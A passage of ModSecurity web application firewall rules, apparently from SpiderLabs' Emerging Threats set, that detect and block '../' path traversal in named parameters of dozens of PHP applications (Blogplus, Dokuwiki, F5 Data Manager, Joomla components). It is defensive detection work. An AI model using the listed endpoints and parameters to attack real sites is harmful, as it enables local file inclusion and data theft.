WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,34265'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:theme_directory "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Acute Control Panel container.php theme_directory parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009380) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter local file inclusion SecRule REQUEST_LINE "@contains /header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009380,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter local file inclusion',tag:'web-application-attack',tag:'bugtraq,34265'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:theme_directory "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Acute Control Panel header.php theme_directory parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009904) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /latestposts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009904,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:forumspath "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS AdaptBB latestposts.php forumspath Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009195) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /main.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009195,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mj_config[src_path] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Basebuilder main.inc.php mj_config Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009417) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_center_down.php Local File Inclusion SecRule REQUEST_LINE "@contains /block_center_down.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009417,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_center_down.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_blocks_center_down[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_center_down.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009418) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_center_top.php Local File Inclusion SecRule REQUEST_LINE "@contains /block_center_top.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009418,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_center_top.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_blocks_center_top[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_center_top.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009420) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_left.php Local File Inclusion SecRule REQUEST_LINE "@contains /block_left.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009420,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_left.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_blocks_left[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_left.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009421) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus block_right.php Local File Inclusion SecRule REQUEST_LINE "@contains /block_right.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009421,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus block_right.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_blocks_right[file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus block_right.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009422) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus window_down.php Local File Inclusion SecRule REQUEST_LINE "@contains /window_down.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009422,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus window_down.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_bloginfo[theme] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus window_down.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009423) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Blogplus window_top.php Local File Inclusion SecRule REQUEST_LINE "@contains /window_top.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009423,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Blogplus window_top.php Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34261'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:row_mysql_bloginfo[theme] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Blogplus window_top.php Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009429) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CAT2 spaw_control.class.php spaw_root Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /spaw_control.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009429,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS CAT2 spaw_control.class.php spaw_root Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,30042'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:spaw_root "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CAT2 spaw_control.class.php spaw_root Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009764) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /portfolio/css.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009764,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32218'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:theme "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Cyberfolio css.php theme Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010025) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /dm-albums/template/album.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010025,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,35521'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:SECURITY_FILE "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DM Albums album.php SECURITY_FILE Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009324) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Demium CMS urheber.php name Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /urheber.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009324,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Demium CMS urheber.php name Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33933'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:name "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Demium CMS urheber.php name Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009876) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dokuwiki doku.php config_cascade Local File Inclusion SecRule REQUEST_LINE "@contains /doku.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009876,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Dokuwiki doku.php config_cascade Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,35095'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:config_cascade[main][default][] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dokuwiki doku.php config_cascade Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008832) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthusiast path parameter Local File Inclusion SecRule REQUEST_LINE "@contains /show_joined.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008832,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Enthusiast path parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthusiast path parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009428) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ExBB threadstop.php exbb Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /threadstop/threadstop.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009428,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ExBB threadstop.php exbb Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,28686'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:exbb[default_lang] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ExBB threadstop.php exbb Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010800) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager DiagLogListActionBody.do Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /acopia/manager/DiagLogListActionBody.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010800,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager DiagLogListActionBody.do Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:logFile "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager DiagLogListActionBody.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010801) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /acopia/manager/DiagCaptureFileListActionBody.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010801,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:captureFile "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010802) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager ViewSatReport.do Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /acopia/sat/ViewSatReport.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010802,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager ViewSatReport.do Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:fileName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager ViewSatReport.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010803) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do capture parameter LFI Attempt SecRule REQUEST_LINE "@contains /acopia/manager/DiagCaptureFileListActionBody.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010803,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do capture parameter LFI Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:capture "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager DiagCaptureFileListActionBody.do capture parameter LFI Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2010804) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS F5 Data Manager ViewInventoryErrorReport.do Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /acopia/sat/ViewInventoryErrorReport.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010804,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS F5 Data Manager ViewInventoryErrorReport.do Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:fileName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager ViewInventoryErrorReport.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009507) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /sitemap.xml.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009507,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:dir[classes] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009745) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flatchat pmscript.php with Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /pmscript.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009745,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Flatchat pmscript.php with Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34734'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:with "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flatchat pmscript.php with Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008878) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR Local File Inclusion SecRule REQUEST_LINE "@contains /init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008878,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:API_HOME_DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009652) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FreeWebShop startmodules.inc.php lang_file Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /includes/startmodules.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009652,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS FreeWebShop startmodules.inc.php lang_file Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34538'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:lang_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FreeWebShop startmodules.inc.php lang_file Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008937) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gravity-gtd rpc.php objectname parameter Local File Inclusion SecRule REQUEST_LINE "@contains /library/setup/rpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008937,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS gravity-gtd rpc.php objectname parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/7344'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:objectname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gravity-gtd rpc.php objectname parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009231) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Local File Inclusion SecRule REQUEST_LINE "@contains /includes/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009231,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Local File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-2898'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:c_temp_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2011140) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JE Ajax Event Calendar view Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011140,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS JE Ajax Event Calendar view Parameter Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_jeajaxeventcalendar&" "chain" SecRule ARGS:view "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JE Ajax Event Calendar view Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008651) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JMweb MP3 src Multiple Local File Inclusion SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008651,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS JMweb MP3 src Multiple Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6669/'" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:src/' "@gt 0" "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:src/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS JMweb MP3 src Multiple Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009508) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Job2C windetail.php adtype Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /windetail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009508,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Job2C windetail.php adtype Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34537'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:adtype "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Job2C windetail.php adtype Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009509) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Job2C detail.php adtype Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /detail.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009509,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Job2C detail.php adtype Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34537'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:adtype "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Job2C detail.php adtype Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2008822) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008822,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6980/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_pro_desk" "chain" SecRule &TX:'/DIR_TRAVERSAL.*ARGS:include_file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/LFI-%{matched_var_name}=%{matched_var}'" # (2009929) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt SecRule ARGS_NAMES "(?i:target)" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009929,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion 